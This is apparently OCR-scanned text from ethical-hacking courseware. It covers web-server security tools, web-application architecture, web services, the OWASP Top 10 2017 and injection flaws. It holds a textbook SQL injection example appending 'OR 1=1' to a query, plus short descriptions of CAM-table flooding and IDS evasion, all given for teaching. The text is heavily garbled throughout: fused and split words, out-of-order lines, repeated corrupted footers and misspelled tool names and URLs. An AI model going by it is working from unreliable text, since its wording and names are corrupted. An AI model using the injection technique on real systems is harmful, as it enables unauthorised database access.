othersecurity assessmentactivities.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication Scanners
Security

and web |
testing application aWabag
|Ingmar
‘yhuct
yr to automate
helps ecurty
|
Sphuntitybia quardtheorgniaten'swebinfastuctre N-talkerx
Sane’

WebApplication Scanners
Security
+
syhunt
Hybrid
Source: http://ww.syhunt.com
TheSyhunt Hybridscanner automateswebapplication testing
security andguardsthe
organization's
web infrastructureagainstweb applicationsecuritythreats. Syhunt
Dynamic crawlswebsitesand detects XSS,directory transversalproblems, fault
injection,SQLinjection,attemptsto execute commands,and severalother attacks.
Syhunt Hybrid to detect application
creates signatures vulnerabilitiesand prevents
logout.
It analyzes (JS),
JavaScriptlogs
suspicious andtestserrors for review.
responses,

ical andCountermensores
Mackin ©by E-Comel
Copyright
N-StalkerX
13.46:
Figure Screenshot
Hybrid
of Shunt
websecurity
appiation scanner

Source:https://www.nstalker.com
N-Stalkeris a web application securityscanner that searchesfor vulnerabilitiesto
attackssuchas clickjacking, SQLinjection, andXSS.It allowsspider
crawling throughout
the applicationandthe creation of web macros for formauthentication.It alsoprovides
proxycapabilities for “drive-thru―
attacksand identifiescomponents through reverse
proxiesthat distributedifferentplatformsi n the same application
URL.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 might
tobe
‘Application
‘vulnerable
Clehjacking
attacks

Thefollowing
are some additionalweb application
of x
Fgure13.47:ScreenshotWtalkor
security
scanners:
‘*
(https://www,netsparker.com)
Netsparker
=
Burp (https://www.portswigger.net)
Suite
=
(http://wapiti.sourceforge.net)
Wapiti
+
(https://www.owasp.org)
Webscarab
Sec (https://wpsec.com)
TinfoilSecurity
(https://wuvw.tinfoilsecurity.com)
Skipfish
(https://code
google.com)
Detectify
(https://detectify.com)
Fortyon Demand(hetpsi//www.microfocus.com)
OWASP (ZAP)
ZedAttackProxy (https://www.zaproxy.org)
 (https://www.sonarqube.org)
SonarQube
Arachni(https://www.arachni-scanner.com)
w3af(http://w3af.ora)
Grabber(http://rgaucher.info/beta/arabber)
(https://subgraph.com)
Vega

Module3 1700
Page tical MakingandCountermensores
by
Copyright©
Comet
 WebServerSecurity
Scanners
ScanMyServor

Stanwy
Fenven

Testof
Your
or
tne Sacuty Waste BlogFree

WebServerSecurity
Scanners
=
ScanMyServer
Source:https://www.scanmyserver.com
is usedto find security
‘ScanMyServer vulnerabilitiesi n a website
or webserver. It can
comprehensive
generate test reportsand assistin fixing problems
security that might
exist i n a company’s
websiteor web server.

Stanmy[9
FEERVER
me

‘Test
the of Your Website
Security

13.48:Screenshotof SanMyserver
Figure

=
Qualys
are
Thefollowingsome additional
webserver security
Edition(hetps://www.qualys.com)
Community
scanners:
+
(https://observatory.
Observatory mozilla.org)
Scan(https://hackertarget.com)
WordPressSecurity

ical andCountermensores
Mackin ©by E-Comel
Copyright
=

=
Web Scanner
Vulnerability (https://pentest-tools.com)
(https://cirt.net)
Nikto2

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerMalwareInfection Monitoring
Tools
Guatrsouard

WebServerMalware InfectionMonitoring
Tools
=
QualysGuard
MalwareDetection
Source:https://www.qualys.com
QualysGuard to proactively
MalwareDetectionallowsorganizations scan theirwebsites
for malwareand provides automatedalertsand in-depth reportingto enableprompt
identificationandresolution.It enablesorganizations their customers from
to protect
malwareinfectionsandsafeguard their brandreputation.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 13.49Screenshot
Figure of QualysGuard
Malware
Detection

Theare
some malware
following additional
web server infectionmonitoring
tools
=

=
Sucuri (https://sucuri.net)
SiteCheck
(https://www.sitelock.com)
SiteLockSMART
©
Quttera(https://www.quttera.com)
(https://www.webinspector.com)
WebInspector

(hetps://www.siteguarding.
SiteGuarding

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerSecurity
Tools

WebServerSecurity
Tools
+
FortfyWebinspect
Source:http://www
microfocus.com
FortifyWebInspect is an automateddynamic testingsolutionthat discovers
configuration
issuesaswell as identifiesandprioritizes vulnerabilitiesin running
security
applications,
It mimics real-worldhacking
techniques
and provides
a comprehensive
dynamicanalysis
of complex
webapplications
andservices. Webinspectdashboardsand
reportsprovide with visibility
organizations and an accurate risk postureof its
applications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1350:Sereenshot
Figure of FortyWeblnspect
Thefollowing
are some additionalweb server security
tools:
=
AcunetixWebVulnerability (https://www.acunetix.com)
Scanner
Retina Scanner(https://www.beyondtrust.com)
Host Security
‘=
SecureConfiguration
Neti@ (https://www.netig.com)
Manager
Suite(https://www.carson-saint.com)
SAINTSecurity

x
Interceptfor Server(https://www.sophes.com)
Sophos

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServerPenTesting
Tools

‘Web
Test
Server Pen
‘Toole

WebServerPenTesting
Tools
+
Impact
CORE
source: https://uww.coresecurity.com
COREImpact i n an organization's
findsvulnerabilities webserver. Thistool allowsa user
to evaluatethe security
posture of a web server byusingthe same techniques currently
employed bycyber criminals.It scans for possible vulnerabilitiesi n the web server,
importsscan results,and runs exploits to test the identifiedvulnerabilities.It can also
scan network servers, workstations, firewalls, routers,and various applications for
Vulnerabilities;identifywhich vulnerabilitiespose real threats to the network;
determinethe potential impactof exploited vulnerabilities;and prioritizeand execute
remediationefforts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Thefollowing
of
CORE
Impact
gute 13.51:Sereenshot
are some additional
webserver pen testingtools:
=
Immunity (https://www.immunityine.com)
CANVAS
=
Arachni(https://www.arachni-scanner.com)
=
WebSurgery
(http://sunrisetech.gr)

Module1 3Page
1708 tical andCountermensores
Making by Comet
Copyright©
 Module Summary

Inthis
madue,
dcutted we have the following

Wb arver attack i deta, ncusing

methodology etherngwebserver
information
websitemroring unerabity
footprinting s canning
seston lacing.a ndweb
server passwordshacking
tool
Vorioutwebserver hacking

byteat actors
attempts
atch management
concepts
Detaledeiscusion on web servers using
securing tols
various security

nthe
pen next
wil
web
module,we
testers,
hack
discussi n deta how attackers,
apoiations
aswell a s ethicalhacers and

Module Summary
In thismodule, we discussed in detail generalconceptsrelatedto web servers; various web
server threatsand attacks;the web server attack methodology, whichincludesinformation
gathering,webserver footprinting,websitemirroring,vulnerability
scanning,sessionhijacking,
and web server passwords hacking; and various web server hackingtools. Additionally,we
discussed various countermeasures that can be employed to preventweb server hacking
attemptsbythreat actors.We alsodiscussed patch
management concepts.Thismoduleended
with a detaileddiscussion
on howto secure webservers usingvarious securitytools.
In the next module,we will discuss
in detailhowattackers,as well as ethicalhackers
andpen
testers,hackweb applications,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Certified
| Ethical Hacker

& Module14;
~

inlelel
diate
MUM-loW\o}e)iex
 Module Objectives

Module Objectives
evolutionof the Internet andweb technologies,
‘The combinedwith rapidly increasingInternet
hasled to the emergence
connectivity, of a new businesslandscape.
Webapplications are an
integral
component
web applications
networking
of
online businesses.Everyoneconnectedvia the Internet is usingvarious
for differentpurposes,including emall,chats,
online shopping, andsocial

Webapplications
are becoming
increasingly
vulnerableto more sophisticated
threatsand
attackvectors. Thismodulewill familiarizeyou with various web applications andwebattack
vectors as well as how to protect an organization's informationresources from them. It
describes the general
web application
hacking methodology that most attackersuse to exploit
a
targetsystem.Ethicalhackerscan use this methodology to assess their organization’s
security
againstweb applicationattacks.Thismodulewill alsofamiliarizeyou with web API,webhooks,
andwebshellconcepts as well as hacking.In addition,
it discusses severaltoolsthat are useful
in different ofwebapplication
stages security
assessment.

will to:
At theendof thismodule,you beable
+

Describe
Perform
application
web
application
various web
concepts
attacks
=

Use
the
web hacking
Describe application
different
methodology
hacking
webapplication tools,
Explain
web API,webhooks,andwebshellconcepts
Understand
via
how to hackweb applications
web API,webhooks,
andwebshells,

ical andCountermensores
Mackin ©by E-Comel
Copyright
=

=
Adoptcountermeasures
against
web
application
attacks
Usedifferentweb application testingtools
security

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Application
‘Web Concepts Hacking
Methodology
oe oe

Application
Web Threats
Web
ADL,abo,

———_—_=[[_
:
»-_—
=
‘Web
ApplicationSecurity

—=<« f°
Web Application
Concepts
Thissection describes
the basicconcepts
associated with webapplications
vis-8-vis security
concerns—their
components, how theywork,their architecture,
and so on. Furthermore, it

provides
web
services
vulnerability
insightsinto and stacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Introductionto WebApplications
\Web an interface
provide
a pplications between
endusers andwebservers through
ast ofwebpagesthatare

webapplications
Though enforce
certain
security
polices,
to theyare vulnerable
various attackssuch
9s SOL

How aa:
Applications
Web =

Introduction to WebApplications
Webapplications are softwareprograms that run on web browsers and act as the interface
betweenu sers andwebservers through web pages.They enablethe usersto request, submit,
and retrieve data to/froma databaseover the Internet byinteracting through a user-friendly
graphical user interface(GUI).
Userscan inputdatavia a keyboard, mouse, or touchinterface
depending on the devicetheyare usingto access the web application. Basedon browser-
supported programming languages suchas JavaScript, HTML, andCSS, web applicationsworki n
combinationwithother programming
Webapplications are developed
languages
as dynamic
to
suchas SQL accessdatafromthedatabases
web pages,and theyallow users to communicate
with servers using server-sidescripts.They allow users to perform specific
taskssuchas
searching, sending emails,connecting with friends,onlineshopping, and tracking and tracing,
Furthermore, there are severaldesktop applications that provideusers with the flexibility
to
workwith the Internet,
Entitiesdevelop various web applications to offer their services to users via the Internet.
Whenever users need to access suchservices, theycan requestthem bysubmitting the
UniformResource Identifier (URI)or UniformResource Locator(URL) of the web application in
a browser.
Thebrowser passes thisrequestto theserver, whichstores thewebapplication data
and displaysit in the browser.Somepopular web servers are Microsoft11S, Apache HTTP
Server,H20,LiteSpeed, Cherokee, etc.
Increasing
Internet usageand expanding have accelerated
onlinebusinesses thedevelopment
and ubiquity
of web applications
across the globe.A keyfactor i n the adoption
of web
applications
forbusiness thattheyoffer.Moreover,
purposesi s the multitudeoffeatures they
are secure and relatively In addition,
easy to develop. theyoffer better services than many
computer-based
software
applications
are
easy
install,
andand to

ical
maintain, update.
andCountermensores ©
Mackin by E-Comel
Copyright
 advantages
‘The ofwebapplications
are listedbelow:
=
As they are independent of the operatingsystem,their development
and
troubleshooting
are easyandcost-effective.

Theyare accessible
anytimeand anywhere
using a computerwith an Internet
connection,

making
Theuser interfaceis customizable, it easyto update.
Userscan access themon any devicehaving including
a n Internet browser, PDAs,
smartphones,
etc.
servers, monitoredand managed
Dedicated byexperienced
server administrators,
store

web allowing
Multiple
developers
allthe application
their
data,
locationsof servers not
increase workload
to
onlyincrease physical
capacity.
but alsoreducethe
security
burdenof monitoring
thousands of desktops
usingthe program,
They
u se flexiblecore technologies,
suchas JSP,
Servlets, SQL
Active ServerPages,
Server, languages,
.NET,and scripting which are scalableand supporteven portable
platforms.
Although enforcecertain securitypolicies,
web applications theyare vulnerableto various
attackssuchas SQL cross-sitescripting,andsession hijacking.
injection,
How WebApplications Work
Themain function
of webapplications
is to fetchuser-requested
datafroma database.
Whena
user clicksor enters a URLi n a browser,
the web application
immediately
displays
the
requested
websitecontent in thebrowser.
involvesthe following
Thismechanism steps:
First, the user enters the websitename or URLin the browser.Then,
the user'srequest
is sent to theweb server.
(Onreceivingthe request,theweb server checksthefile extension
© If the user requestsa simple
web pagewith an HTM or HTMLextension,the web
server processesthe request
andsendsthefile to theuser'sbrowser.
© Ifthe
server user
requests
side,
the request.
with
extension
needs
suchas php,processed
a webpage an
asp, andcfm,thentheweb application
that
server
to be at the
must process

Therefore,
the web server passesthe user'srequest to the web applicationserver,
whichprocesses theuser'srequest.

or server
Theweb application then accesses the databaseto perform the requested task
byupdatingretrieving theinformationstoredon it.
After processing
the request,the web application server finally
sendsthe resultsto the
web server,whichin turn sendstheresultsto the user'sbrowser.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TEE eetscr team news were 1a 6329

16.1:Working
Figure ofwebapplications

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebApplication
Architecture

WebApplication
Architecture
Webapplications
etc.)
run on webbrowsers
scripts(HTML,
andclient-side
the web application
depends
andset
etc.)
JavaScript,
use a of server-side
scripts
to execute the application.
on its architecture,
Theworking
of
Ci,Ruby,
(Java,
whichincludeshardwareand softwarethat
PHP,

performtaskssuchas reading
the requestas well as searching,
gathering,
and displaying
the
required
data
Theweb application architectureincludesdifferent devices,web browsers,
andexternalweb
services thatworkwithdifferent
scriptinglanguages to execute theweb application.
It consists
of threelayers:
1.
or
Client presentation
logic
2. Business layer
layer

layer
3. Database
Theclientor presentation layerincludesall physical devicespresent on the clientside, suchas
laptops, smartphones, andcomputers. Thesedevicesfeatureoperating systems andcompatible
browsers, whichenableusersto sendrequests forrequired web applications.Theuser requests
a websitebyentering a URLi n the browser, andthe request travelsto theweb server. Theweb
server then responds to the requestand fetches the requested data;the application finally
displays
The “business
a
this responsei n the browseri n the formof web page.
logic―
layeritselfconsists of two layers: the web-server logiclayer and the
business logiclayer. Theweb-serverlogic layer contains various components suchas a firewall,
an HTTPrequest parser,a proxycaching server, an authenticationandlogin handler, a resource
handler, and a hardwarecomponent, e.g.,a server. Thefirewallofferssecurity to the content,
the HTTPrequest parser handlesrequests comingfromclientsand forwardsresponses to them,

Module4 1717
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
and the resource handleri s capableof handling
multiple simultaneously.
requests Theweb-
layercontains codethat readsdatafromthe browserand returns the results(e.g.,
server logic
IISWebServer, Apache WebServer).
The businesslogiclayerincludesthe functional logicof the web application, which is
implemented usingtechnologies suchas .NET,Java,and“middleware―.
It definesthe flow of
data,according to whichthe developerbuildsthe application
usingprogramming languages. It
stores the application
dataandintegrates legacyapplications
withthe latestfunctionalityof the
application.The server needsa specific to access user-requested
protocol data from its
database. Thislayercontainsthesoftwareanddefinesthe stepsto searchandfetchthedata
The databaselayer consists of cloud services, a 828 layer
that holdsall the commercial
transactions,and a databaseserver that supplies an organization's
production data in a
structured form(e.g.,
MS SQLServer, MySQL server).

ren
14.2:Web
Figure
Application
Architecture

ical andCountermensores
Mackin ©by E-Comel
Copyright
 WebServices
(©.
software
tothats
deployed
standard
Awebservice isan applation
or

messaging
sch as SOAP,UDD),WSDL,a ndREST enable
over he Interneta nd wes
communication
between applations fore
developed
protocols

Web
‘Types
of Services WebServiceArchitecture
© SORP
web services

(eResThuw ebservices
1 tesbssed ona at ofconse sng tte.

WebServices
Aweb service is an application
or softwarethat is deployed over the Internet.It usesa standard
messaging protocol (suchas SOAP) to enablecommunication betweenapplications developed
on different platforms.
For instance,Java-based services can interact with PHPapplications.
web-basedapplications
‘These are integratedwith SOAP, UDDI,WSDL, and RESTacross the
network.
WebServiceArchitecture
web service
‘A architecturedescribesthe interactions amongthe service provider,
service
Theseinteractions consistof threeoperations,
andservice registry.
requester, namely
publish,
find,andbind.All theserolesand
software (services)
modules andtheir descriptions. operations
work together
on web service artifactsknownas

Serviceproviders offer web services. Theydeploy and publish

service descriptions
of a web
service to a service registry.Requesters find thesedescriptions
from the service registry
and
se themto bindwith theweb service provider andinvoketheweb service implementation.
Thereare threerolesin a web service:
=

=
ServiceProvider:Itis
ServiceRequester:
platform
It is an
a application are
fromwhereservices provided.
seeking
or clientthat is a service or trying
to
establishcommunication with a service. In general,
the browseris a requester, which
invokesthe service
It is the
ServiceRegistry:
on
of provider descriptions.
behalf
place
wherethe
a user.

loadsservice The
discoversthe service and retrieves binding
service requester data from the service
descriptions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘There in a webservice architecture:
are threeoperations
Publish:During service descriptions
thisoperation, are published
to allowthe requester
to discoverthe services.
Find:Duringthisoperation,
the requester tries to obtainthe service descriptions.This
operationcan be processed i n two different phases: obtaining the service interface
description
at development
time andobtainthe binding andlocation descriptioncallsat
run
time.
Bind:During thisoperation, the requester
callsandestablishes communication with the
services during r un time, usingbindingdatainsidetheservice descriptions
to locateand
invokethe services.
‘There
are two artifactsi n a web service architecture:

Service:It is a softwaremoduleofferedbythe service provider over the Internet. It

communicateswith the requesters.
At times,i t can also serve as a requester, invoking
otherservicesin its implementation.
ServiceDescription: interface
It provides detailsand service implementation
details.It
networklocations,
consists of all the operations, binding details,
datatypes,
ete. It can
bestoredin a registry andinvokedbytherequester.

-5).
Service
Registry
(Contains
Service
Description)

<
@s
Service
‘a
Requester Service
Serica
Provider
(contains
‘Service
ed

Descriptions).
14.3:WebService
Figure Architecture
Characteristics
of WebServices
XML-based:Web services use XML for data representation
and transportation.
XML
usagecan avoid0S,networking, or platform binding. that provide
Applications web
services are highly

Coarse-grained
interoperable.
service: In web services, some objects
contain a massive amount of
information functionality
and offergreater thanfine-grained
services. A coarse-grained
service multiple
is a combination
of fine-grained
services.

Loosely
coupled: Webservices supporta loosely
coupled approach for interconnecting
can occur via the web API bysending
The interaction betweenthe systems
systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 XMLmessages. ThewebAPIincorporates ofabstraction
a layer forthe infrastructure
to
makethe connection flexibleandadaptable.
‘Asynchronous
and synchronous Synchronous
support: services are calledbyusers who
whereasasynchronous
wait for a response, servicesare calledbyusers whodo not wait
for a response.RPC-based anddocument-based
messages messagesare often usedfor
synchronousand asynchronous web services. Synchronousand asynchronous
endpoints
are implemented usingservlets,SOAP/XML,
andHTTP.
RPCsupport:Webservices support calls(RPC)
remote procedure to traditional
similarly
applications.
Types
of WebServices
Webservices are of two types:
=
SOAPwebservices
The Simple ObjectAccessProtocol(SOAP) definesthe XML format.XML is usedto
transferdata betweenthe service provider
andthe requester.It alsodeterminesthe
procedure to build web services and enablesdata exchange between different
programming
languages.
RESTful
webservices
Representational State Transfer(RESTful)
web services are designedto makethe
more productive.
services Theyuse many underlying HTTPconcepts to define the
services. Itis an architectural ratherthan a protocol
approach likeSOAP.
ofWebServiceArchitecture:
Components
UDDI:UniversalDescription,
=
Discovery,
listsallthe servicesavailable.
andIntegration(UDDI) is a
directory
service that

WSDL: WebServices Description

Language language
is an XML-based that describes
and
traces webservices.
WS-Security: (WS-Security)
WebServicesSecurity plays role i n
a n important securing
web services. It is an extension of SOAPand aims to maintain the integrityand
confidentiality
of SOAPmessages as well as to authenticateusers.

features/components
Thereare other important of theweb service architecture,
suchas WS:
Work Processes, WS-Policy,
and WS Security
Policy,
which playan importantrole in
communication betweenapplications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Stack
Vulnerability

‘Custom
Web
Applications:
‘Third-party
Components.
Fa
3
“ectWerbiis

‘Open
Source / Commercial

‘Web
Server / HS
‘Apache
Microsoft
=

og sen
e re /08%
inn
onset

outer Ste

Secu 175/105

Vulnerability
Stack
Onemaintains and accesseswebapplications throughvarious levelsthat includecustom web
applications,third-partycomponents, databases, web servers, operating systems, networks,
andsecurity.

security
or services employed
All the mechanisms
the web application securely.
Whenconsidering
as a criticalcomponentbecause
at eachlayer
web applications,
web applications
enable the user to access
the organization considers
are majorsources of attacks.The
vulnerability
stackshowsvarious layers andthe correspondingelements/mechanisms/services
‘that
make
web
applications
vulnerable.
Web Applications
‘Custom B, oper Tectia! Wane

ThComponent
Web
pr

Server
(¢
ayers
wes ease

/
‘Apache
meet
IS
Microsot

owtere aes Be coy

/ /05
04

iz ayer @i
Operating
System Windows
nus x

aBE]
=

security ey
1
/
outer Switch
ws /105
yer

18.4:Vulnerability
Figure Stack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 exploit
Attackers thevulnerabilities
of one or more elementsamongthe seven levelsto gain
unrestrictedaccess to an application
or the entire network

layer?
If an attackerfindsvulnerabilities logic
in thebusiness (implemented usinglanguages
suchas .NETand Java), he/she c an exploit
thesevulnerabilitiesbyperforming
input
validationattackssuchas XS.
Layer 6
Third-party components are services that integratewith the websiteto achievecertain
functionality(e.g.,
Amazon.comtargeted byan attackeris the main website;citrix.com
website).
is a third-party

Whencustomerschoosea product to buy, theyclickon the Buy/Checkout button.This

redirects themto theironlinebanking account through a payment gateway.Third-party
websitessuchas citrix.com offer suchpayment gateways. Attackersmightexploit such
redirection
a
anduse it as medium/pathway
toenter
Amazon.com
exploit and it
layer
5
Webservers are softwareprogramsthat hostwebsites.Whenusersaccessa website,
theysenda URLrequestto theweb server. The server parsesthisrequestandresponds
with a web pagethat appearsin the browser.Attackerscan perform footprintingon a
web server that hoststhe targetwebsiteand grab bannersthat contain information
suchas the web server name and its version, Theycan alsouse tools suchas Nmap to
gather suchinformation.Then,theymight start searching
for publishedvulnerabilitiesi n
the CVEdatabaseforthat particular web server or service version numberandexploit
any
that
4they
layer
find

Databases store sensitive user information

suchas user IDs,passwords, phonenumbers,
and other particulars. Therecould be vulnerabilitiesi n the databaseof the target
website. Thesevulnerabilities can be exploited
byattackers usingtoolssuchas sqlmap
to gain controlof the target’s
database.
layer3
Attackersscan an operating systemto find open portsand vulnerabilities, and they
develop viruses/backdoorsto exploitthem.They sendmalwarethrough the openports
to the targetmachine; byrunningsuchmalware, theycan compromise the machineand
gaincontrolover it. Later,
theytryto accessthedatabases of the targetwebsite
Layer
2
Routers/switches
switches
route networktrafic onlyto specificmachines, Attackersflood these
with numerous requests that exhaustthe CAMtable, causingit to behave lke a
hub.Then, theyfocuson the target websitebysniffingdata (inthe network), whichcan
includecredentialsor otherpersonal information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
layer1
IDSand IPSraise alarmsif any malicioustraffic enters a targetmachineor server.
adoptevasion techniques
‘Attackers to circumvent suchsystemsso that they do not
triggeranyalarmwhile exploiting
the target.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Application
‘Web Concepts
——_——_=S=—
Woo Applicaton

Web
Threats API,
Application Webhooks,
e—————_=_[
Web
DPE weno

| Application
‘Web Security
7
—
Web Application
Threats
Attackers attempt various application-level attacks to compromise the securityof web
applicationsto commit fraudor stealsensitive information.Thissection discusses
the various
typesof threatsandattacksagainstthe vulnerabilitiesof webapplications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 OWASP
Top10Application Risks 2017
Security -

CEH
Kl ietion KG Security
Misconfigration

‘Broken
Authentication
ros ite (XS)
Serpting

ML ExtrmalEntity
OE) Using withKnown
Components
Vulnerabilities,

‘Broken
AccessControl InsuicentLogging
and
Monitoring

OWASPTop10 Application
Security
Risks 2017 -

Source:https://www.owasp.org
i s an international
OWASP that specifies
organization the top 10 vulnerabilities
and flawsof
‘web
applications.
ThelatestOWASP
A1~Injection
top10
application
security
risks
are
as follows:

flaws,such as SQL,commandinjection,and LDAPinjection,occur when

Injection
untrusteddata is sent to an interpreter
hostiledatacan trickthe interpreter
datawithout proper authorization.
a
as partof command
into executing
or query. Theattacker's
unintended
commands or accessing

‘A2—
BrokenAuthentication
functionsrelated to authenticationand session management
Application are often
implemented
incorrectly,
thereby allowing passwords,
attackersto compromise keys,or
session tokensor to exploit
other implementation
flawsto assume identitiesof other
users

-
(temporarily
or
A3 SensitiveDataExposure
permanently).

Manyweb applicationsand APIs do not properly protectsensitive data,suchas

financial, and personally
healthcare, identifiable
information(Pll)data.Attackersmay
stealor modify
suchweakly
protecteddata to conductcreditcardfraud,identity
theft,
or othercrimes. Sensitivedatarequiresextra protection
suchas encryption
at rest or i n

as special
transit, wellas
precautions whenexchanged withthe browser.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 XMILExternal
‘Ad Entity(XXE)
Many older or poorlyconfigured XML processors evaluateexternalentityreferences
withinXML documents. Externalentities can disclose internal filesusingthe file URI
handler,internalSMBfile shareso n unpatched Windowsservers, internalportscanning,
remotecodeexecution,andDoSservice attacks suchas the billionlaughs attack.
Broken
‘AS
~
Access Control
Restrictionson whatauthenticatedusersare allowedto do are not properly enforced.
Attackers can exploit theseflawsto accessunauthorized functionalityand/or data,such
as accessing other users’
accounts, viewingsensitive files,modifying data,
other users’
andchanging access rights

Security
‘AG
~
Misconfiguration
Securitymisconfiguration is the most common issuei n websecurity, whichis due in part
to manual or ad hoc configuration (or no configuration at all),i nsecure default
configurations, open $3 buckets,misconfigured HTTP headers,error messages
containing sensitive information, and not patching or upgrading systems, frameworks,
dependencies, andcomponents inatimely manner (orat all),
[AT Cross-Site
—

Scripting (XSS)
XSSflawsoccur wheneveran application includesuntrusteddata i n a new web page
without propervalidationor escaping, or wheneveri t updates an existing web pagewith
user-supplied data usinga browserAPI that can create JavaScript. XSSallowsattackers
to execute scriptsin the victim'sbrowser, which can hijackuser sessions,deface
or the
websites,redirect user to malicious
InsecureDeserialization
‘AB
~
sites.
Insecuredeserializationflaws occur when an application receives hostile serialized
objects.Insecure deserialization leadsto remote codeexecution. Even if deserialization
flaws do not result in remote code execution, serializedobjects c an be replayed,
tampered with,or deleted to spoof users, conduct injectionattacks, and elevate
privileges.
‘A9Using
—

Components with KnownVulnerabilities

Components such libraries,
as frameworks, andother softwaremodulesrun with the
same privileges as the application. If a vulnerablecomponent is exploited,
suchan
attackcan facilitate serious data lossor server takeover.Applications and APIs using
components with known vulnerabilitiesmay undermineapplication defensesand
enablevarious attacksandimpacts.
‘A10
~
InsufficientLogging
Insufficientlogging
andMonitoring
and monitoring, coupled with missingor ineffectiveintegration
with
incidentresponse,allowsattackersto further attack systems, maintain persistence,
pivotto more systems, andtamperwith,extract,or destroy data.Most breachstudies
showthat the time to detect a breachis over 200 days, typically byexternalparties
ratherthan internalprocesses or monitoring,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Al -

Flaws
Injection
laws
(©Injection
partof3 command
ae webaplication
or query
vulnerabilities
thatallowuntrusteddatatoe interpreted
andexecutedat

Aracers
(©
exploit
injection
malcous
denial queies
data
loss
ae
flaws
byconstructing
arruptin, lackofaccountablty,
or of access,
commands
or that resulta

in
legacy
code,
(©Injection
often
w e are prevalent
‘dscoveed
foundi n SQL,
scanners and
byapletion vulnerabilty furzers
LDAP,XPathqueries, andso. andcanbeeasy

s9u
arian | Hitoies
Sa
the nectionof maliious queriesinto user inputforms

code
aweb
|) ©teinvves theinjectionof malicious through application

Injection |
(©©"
IeinvoWves
the
nection
LDAP ofmalicious
\o statements

Al -
InjectionFlaws
flawsare webapplication
Injection vulnerabilitiesthatallowuntrusteddatato be interpreted
andexecutedas partof a commandor query.Attackersexploit flawsbyconstructing
injection
malicious commands lackof accountability,
or queriesthat resulti n datalossor corruption, or
denialof access. Suchflawsare prevalent i n legacycodeandoften found i n SQL, LDAP, and
XPathqueries.They can beeasily discovered byapplication vulnerability
scannersandfuzzers.
Attackers inject malicious
c ode, commands, or scriptsin the inputgatesof flawedweb
applications suchthat the applicationsinterpretand run the newly suppliedmaliciousinput,
whichi n turn allowsthemto extract sensitive information. Byexploiting flawsi n web
injection
applications,
attackerscan easily
read,write, delete,
and update any data (ie, relevantor
irrelevant
to that
are discussed
below: particular
application).
There some
of
are many typesof injection
flaws, which
*
SQLInjection:
SQLinjection
is the most common websitevulnerability
on the Internet,
andit is usedto take advantageof non-validated
inputvulnerabilitiesto passSQL
commands through a web applicationfor execution bya backenddatabase.In this
technique,
the attackerinjectsmalicious
SQLqueriesinto the user inputformeitherto
gain unauthorizedaccess to a databaseor to retrieve informationdirectly
from the
database.
Command Attackersidentify
Injection: an inputvalidation
flaw in an application
and
exploit
supplied amalicious
injecting
arbitrarycommand
the vulnerability
by i n the application
commandso n the host operatingsystem.
to execute
Thus,suchflawsare
extremely
dangerous.
ical andCountermensores
Mackin ©by E-Comel
Copyright
LDAPInjection: LOAPinjectionis an attack methodi n whichwebsites that construct
LDAPstatementsfromuser-supplied inputare exploited
for launchingattacks.Whenan
applicationfailsto sanitize the user input, the attackermodifiesthe LDAPstatement
with the helpof a local proxy. This, i n turn, resultsi n the execution of arbitrary
commands suchas granting a ccess to unauthorizedqueriesand altering the content
insidethe LOAP tree.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Attacks
SQLInjection
¢|
1 of SOL
queries
non us series matous to eet nase

apoio
erable
cry
messes
and
ect
web to pana oti acs to oad

oo we depunenete mms eae

°>|ed
e °

cou
ee

SQL Attacks
Injection
SQLinjectionattacksuse a series of maliciousSQLqueries or SQLstatements to directly
manipulate
thedatabase. ApplicationsoftenuseSQLstatementsto authenticate
users,validate
rolesand accesslevels,
store and retrieve informationfor the application
anduser, andlink to
other data sources. SQLinjectionattackswork becausethe application doesnot properly
validatethe inputbefore passingit to an SQLstatement. Forexample, considerthe following
SQLstatement:
SELECT * FROMtablename WHEREUserID= 2302
the following
becomes SQLinjection
with a simple attack
SELECT* FROMtablename WHEREUserID= 2302 OR
Theexpression
1=1―
“OR evaluatesto the value“TRUE,―
oftenallowing the enumeration of all
user ID valuesfrom the database.An attackeruses a vulnerableweb application
normalsecurity m easures andobtaindirect accessto valuable
data.Attackers
to bypass
carryout SQL
injectionattacksfromthe webbrowser'saddressbar,formfields, queries, searches,
andso on
SQLinjection attacksallowattackers
to
Log into the application
without supplying
validcredentials
=
data i n the database,
Performqueriesagainst often even datato whichthe application.
normally
would not haveaccess
Modify
databasecontents or drop altogether
the database
Usethe trust relationships
establishedbetweenthe web application
components
to
otherdatabases
access

ical andCountermensores
Mackin ©by E-Comel
Copyright
 > Internet

Figure
14.5:SOL attack
Injection
‘a Serve
code
njecion waa

complete
Note: For coverageof SQLinjection and techniques,
concepts refer to Module 15
SQLInjection.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 CommandInjection
Attacks

Injection
|©Diagnosis.
System
AP Runtime
Process
Shlijectionfenton elude system),
sar) ands
StartProceal
valane
commands
exe,

ML
‘utpt without ccd
being or HIM codeor serptng,

©
wlth| iteyrey omtoneae nine root

CommandInjectionAttacks
Command injectionflawsallowattackersto passmaliciouscodeto differentsystems via web
applications.
Theattacksinclude callsto an operatingsystem over systemcalls,u se ofexternal
programsover shell commands, and callsto backenddatabasesover SQL.Scripts in Perl
Python,and otherlanguages execute and insert poorly designed webapplications. If a web
